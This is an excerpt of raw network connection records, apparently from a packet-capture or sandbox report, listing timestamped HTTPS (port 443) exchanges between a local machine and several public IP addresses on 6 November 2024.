                                                                                                                                                                                                            Nov 6, 2024 06:29:45.530720949 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.531389952 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.531402111 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.531708956 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.531730890 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.536652088 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.536673069 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.536726952 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.536735058 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.536773920 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577167034 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577189922 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577223063 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577235937 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577265024 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.577286005 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604083061 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604142904 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604192972 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604211092 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604821920 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604859114 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.604902029 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618057966 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618077040 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618119955 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618132114 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618163109 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.618174076 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647079945 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647098064 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647144079 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647159100 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647181988 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.647196054 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.660234928 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.660252094 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.660304070 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.660317898 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.660358906 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.700406075 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.700440884 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.700464010 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.700473070 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.700500011 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.748523951 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770356894 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770365000 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770391941 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770414114 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770426035 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770453930 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.770473957 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.782038927 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.782058001 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.782118082 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.782130957 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.782166958 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.804986954 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.805207968 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.805234909 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.806662083 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.806978941 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.807096004 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.807101965 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.807157993 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824162960 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824183941 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824214935 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824223042 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824254990 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.824270964 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827729940 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827745914 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827791929 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827804089 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827832937 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.827861071 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.852560043 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.890377045 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.890674114 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.890685081 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.890969038 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.891299009 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.891362906 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.891444921 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.893865108 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.893882990 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.893920898 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.893928051 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.893969059 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.905992031 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.906007051 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.906059027 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.906069994 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.906117916 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.935334921 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.944600105 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.945367098 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.945398092 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.945547104 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.945552111 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947082996 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947103024 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947143078 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947149992 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947173119 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.947195053 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951128006 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951131105 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951148033 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951200962 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951210022 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951240063 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951256990 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951483965 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951509953 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951940060 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.951946020 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.953687906 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.954009056 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.954058886 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.954421997 CET57721443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.954437017 CET44357721162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.962552071 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.962913990 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.962941885 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.963274002 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.963280916 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.969569921 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.969870090 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.969886065 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.970356941 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.970360041 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.995014906 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.995341063 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.995358944 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.995754004 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:45.995759010 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017252922 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017276049 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017307043 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017313004 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017357111 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.017374039 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028640985 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028661013 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028698921 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028712034 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028745890 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.028768063 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029573917 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029634953 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029642105 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029656887 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029692888 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029706955 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029953957 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.029966116 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.040443897 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.040647984 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.040654898 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.040944099 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.041352034 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.041412115 CET44357722142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.051914930 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.051959991 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.051985979 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052000046 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052006960 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052037954 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052042961 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052100897 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052139044 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052879095 CET57728443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.052891970 CET44357728172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071299076 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071322918 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071357965 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071362972 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071399927 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.071413040 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076276064 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076317072 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076359987 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076703072 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076703072 CET57723443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076716900 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.076725960 CET4435772313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.082406998 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.082531929 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.082571983 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.084512949 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.084536076 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.084585905 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.085030079 CET57730443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.085042953 CET44357730172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.086203098 CET57722443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.093432903 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.093483925 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.093528032 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.100450039 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.100471973 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.100492954 CET57724443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.100498915 CET4435772413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.101850033 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.102255106 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.102297068 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.103164911 CET57726443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.103168964 CET4435772613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.107388020 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.107394934 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.107450008 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.108177900 CET57732443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.108190060 CET44357732104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.111809969 CET57725443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.111816883 CET4435772513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.126760960 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.126773119 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.126823902 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130021095 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130053997 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130105972 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130323887 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130537033 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.130577087 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.133943081 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.133953094 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.134001970 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.134763956 CET57735443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.134780884 CET4435773513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135119915 CET57733443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135129929 CET4435773313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135214090 CET57734443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135234118 CET4435773413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135318995 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135324001 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135335922 CET57727443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.135339022 CET4435772713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.138870001 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.138909101 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.138961077 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.139156103 CET57736443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.139168978 CET4435773613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.139506102 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.140084982 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.140094995 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.140477896 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141149998 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141217947 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141498089 CET57729443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141536951 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141561031 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141598940 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141606092 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141648054 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.141665936 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.142932892 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.142966986 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.143014908 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.144860983 CET57737443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.144876003 CET4435773713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.183336020 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.191868067 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.191907883 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.191987038 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194153070 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194197893 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194237947 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194247961 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194299936 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194299936 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194621086 CET57738443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.194634914 CET44357738172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263197899 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263226032 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263278008 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263288975 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263339996 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.263339996 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.286288023 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.286411047 CET44357729162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.286458969 CET57729443192.168.2.4162.159.140.34
